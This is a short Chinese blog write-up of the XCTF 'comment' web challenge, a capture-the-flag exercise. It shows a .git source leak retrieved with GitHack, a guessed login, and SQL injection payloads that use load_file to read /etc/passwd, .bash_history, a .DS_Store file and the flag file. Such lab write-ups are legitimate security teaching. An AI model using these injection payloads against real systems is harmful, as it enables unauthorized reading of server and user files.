刘功瑞的博客-XCTF 攻防世界 web进阶 comment WriteUp（代码审计,git泄露,sql注入）

XCTF 攻防世界 web进阶 comment WriteUp（代码审计,git泄露,sql注入）

git泄露

QQ截图20191212105951.png

python GitHack.py http://xxxxxxxx/.git

根据提示去猜解爆破即可

user：zhangwei pass：zhangwei666

代码审计后发现注入点

查询/etc/passwd ： ',content=(select load_file('//etc/passwd')),/*

QQ截图20191212105951.png

闭合查询语句

QQ截图20191212105951.png

得到结果

QQ截图20191212105951.png

以此方法继续查询

/bin/bash_history : ',content=(select load_file('//home/www/.bash_history')),/*

bash_history中看到.DS_Store 因为DS_Store 格式问题，所以转成hex读取

继续查询.DS_Store : ',content=(select hex(load_file('//tmp/html/.DS_Store'))),/*

读取出来后，把hex转成字符串，得到flag路径

QQ截图20191212105951.png

读取flag ：',content=(select load_file('//var/www/html/flag_8946e1ff1ee3e40f.php')),/*

QQ截图20191212105951.png

« 2024年5月 »

四

五

六

日

刘功瑞的博客